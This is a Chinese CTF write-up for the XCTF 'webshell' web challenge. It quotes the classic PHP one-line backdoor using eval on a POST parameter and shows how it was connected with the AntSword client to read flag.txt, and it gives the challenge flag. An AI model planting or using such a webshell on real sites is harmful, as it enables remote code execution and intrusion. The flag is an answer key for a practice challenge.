当前位置: 代码迷 >> 综合 >> 攻防世界 web webshell
  详细解决方案

攻防世界 web webshell

热度:76   发布时间:2024-01-26 20:35:38.0

做题两分钟,工具两小时

题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

所谓的php一句话:<?php @eval($_POST['shell']);?>
这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算

这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后门太多了,所以不推荐菜刀了)
这次我用的是antsword,antsword的github链接
这题时间主要花在了解题工具上面,做题倒是很快。

1.右键添加数据
在这里插入图片描述
2.把url和连接密码输进去
因为这题提示是webshell,所以推测密码是shell,一开始我把那个一句话php放进去发现不对…
在这里插入图片描述
3.找到flag.txt
在这里插入图片描述
cyberpeace{17b8c20c87ed744736dca537ddea2777}